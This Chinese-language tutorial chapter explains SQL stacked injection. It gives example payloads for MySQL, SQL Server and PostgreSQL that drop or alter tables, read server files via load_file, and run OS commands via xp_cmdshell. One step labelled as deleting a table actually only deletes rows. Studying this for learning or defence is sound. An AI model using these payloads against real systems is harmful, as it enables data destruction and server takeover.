MYSQL注入天书之stacked injection

第三部分/page-3 Stacked injection

Background-8 stacked injection

Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。

0x01 原理介绍

在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。

例如以下这个例子。

MYSQL注入天书之stacked injection

当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。

0x02 堆叠注入的局限性

堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。

MYSQL注入天书之stacked injection

Ps:此图是从原文中截取过来的,因为我个人的测试环境是php+mysql,是可以执行的,此处对于mysql/php存在质疑。但个人估计原文作者可能与我的版本的不同的原因。

虽然我们前面提到了堆叠查询可以执行任意的sql语句,但是这种注入方式并不是十分的完美的。在我们的web系统中,因为代码通常只返回一个查询结果,因此,堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。

因此,在读取数据时,我们建议使用union(联合)注入。同时在使用堆叠注入之前,我们也是需要知道一些数据库相关信息的,例如表名,列名等信息。

0x03 各个数据库实例介绍

本节我们从常用数据库角度出发,介绍几个类型的数据库的相关用法。数据库的基本操作,增删查改。以下列出数据库相关堆叠注入的基本操作。

Mysql数据库

(1)新建一个表 select * from users where id=1;create table test like users;

MYSQL注入天书之stacked injection

执行成功,我们再去看一下是否新建成功表。

MYSQL注入天书之stacked injection

  1. 删除上面新建的test表select * from users where id=1;drop table test;

    MYSQL注入天书之stacked injection

    MYSQL注入天书之stacked injection

  2. 查询数据select * from users where id=1;select 1,2,3;

    MYSQL注入天书之stacked injection

    加载文件 select * from users where id=1;select load_file('c:/tmpupbbn.php');

    MYSQL注入天书之stacked injection

  3. 修改数据select * from users where id=1;insert into users(id,username,password)

    values('100','new','new');

    MYSQL注入天书之stacked injection

    MYSQL注入天书之stacked injection

    Sql server数据库

  4. 增加数据表select * from test;create table sc3(ss CHAR(8));

    MYSQL注入天书之stacked injection

  5. 删除数据表select * from test;drop table sc3;

    MYSQL注入天书之stacked injection

    (3)查询数据select 1,2,3;select * from test;

    MYSQL注入天书之stacked injection

  6. 修改数据select * from test;update test set name='test' where id=3;

    MYSQL注入天书之stacked injectionMYSQL注入天书之stacked injection

  7. sqlserver中最为重要的存储过程的执行

    select * from test where id=1;exec master..xp_cmdshell 'ipconfig'

    MYSQL注入天书之stacked injection

    Oracle数据库

    上面的介绍中我们已经提及,oracle不能使用堆叠注入,可以从图中看到,当有两条语句在同一行时,直接报错。无效字符。后面的就不往下继续尝试了。

    MYSQL注入天书之stacked injection

    Postgresql数据库

  8. 新建一个表 select * from user_test;create table user_data(id DATE);

    MYSQL注入天书之stacked injection

    MYSQL注入天书之stacked injection

    可以看到user_data表已经建好。

  9. 删除上面新建的user_data表select * from user_test;delete from user_data;

    MYSQL注入天书之stacked injection

  10. 查询数据select * from user_test;select 1,2,3;

    MYSQL注入天书之stacked injection

  11. 修改数据 select * from user_test;update user_test set name='modify' where name='张三';MYSQL注入天书之stacked injection
上一篇:Windows下使用AutoSSH,并作为服务自启动(不用安装Cygwin)


下一篇:MGR实现分析 - 成员管理与故障恢复实现